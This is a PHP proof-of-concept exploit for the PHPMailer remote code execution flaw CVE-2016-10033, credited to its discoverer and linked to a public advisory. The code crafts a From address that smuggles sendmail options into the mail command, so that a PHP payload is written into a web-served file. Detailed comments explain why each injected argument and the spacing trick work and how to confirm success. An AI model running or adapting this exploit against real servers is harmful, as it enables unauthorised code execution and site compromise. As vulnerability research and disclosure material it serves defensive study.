<?php
/*
PHPMailer <5.2.18 Remote Code Execution (CVE-2016-10033)
Discovered/Coded by:
Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
A simple PoC (working on Sendmail MTA)
It injects the following parameters into the sendmail command line:
Arg no.0==[/usr/sbin/sendmail]
Arg no.1==[-t]
Arg no.2==[-i]
Arg no.3==[-fattacker\]
Arg no.4==[-oQ/tmp/]
Arg no.5==[-X/var/www/cache/phpcode.php]
Arg no.6==[some"@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the message
(each line carries sendmail's -X transfer-log prefix, here `09607<<<`):
09607<<< --b1_cb4566aa51be9f090d9419163e492306
09607<<< Content-Type: text/html; charset=us-ascii
09607<<<
09607<<< <?php phpinfo(); ?>
09607<<<
09607<<<
09607<<<
09607<<< --b1_cb4566aa51be9f090d9419163e492306--
See the full advisory URL for details.
*/

// Attacker's input coming from an untrusted source such as $_GET, $_POST etc.
// For example from a contact form
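// ---------------------------------------------------------------------------
// PoC body. Run only against systems you are authorised to test.
//
// In the vulnerable scenario the sender address arrives from an untrusted
// source (e.g. a contact-form field in $_GET / $_POST); it is hard-coded here
// so the PoC is self-contained.
// ---------------------------------------------------------------------------

// Crafted From address. The backslash-escaped quote keeps the value a
// syntactically valid quoted local-part, so it passes PHPMailer's address
// validation, while the words after it are handed to the sendmail binary as
// extra options (see the argv listing in the header comment):
//   -oQ/tmp/                        queue directory the MTA can write to
//   -X/var/www/cache/phpcode.php    transfer log -> web-served .php file
// The space before `some"@email.com` matters: without it sendmail receives
// "-X/var/www/cache/phpcode.phpsome" as a single argument (the header lists
// the -X path and `some"@email.com` as separate args 5 and 6), and the log
// lands in a file the web server never executes as PHP.
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php some"@email.com';

// Payload. It ends up inside the -X transfer log surrounded by log prefixes
// (see the sample in the header); PHP emits the non-PHP text verbatim and
// still executes the embedded <?php block.
$msg_body = '<?php phpinfo(); ?>';

// mail() parameter injection via the PHPMailer vulnerability.
// PHP mail() is PHPMailer's default transport; the sender reaches the MTA
// through sendmail's -f switch (Arg no.3 in the header), which is how the
// injected options end up on sendmail's command line.
require_once('class.phpmailer.php');

$mail = new PHPMailer(); // default transport: PHP mail()
$mail->SetFrom($email_from, 'Client Name');

$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);

// Send() returning true only means the MTA accepted the message; it does not
// prove the -X log was written. Confirm /var/www/cache/phpcode.php exists, is
// writable by the user sendmail runs as, and is reachable through the web
// server. The header notes this was verified against the Sendmail MTA; other
// sendmail-compatible front ends may ignore or reject -oQ/-X. Against a
// patched PHPMailer (>= 5.2.18 per the header) the injected options should no
// longer reach sendmail even if Send() still reports success.
if ($mail->Send()) {
    echo "Message sent!\n";
} else {
    echo "Mailer Error: " . $mail->ErrorInfo;
}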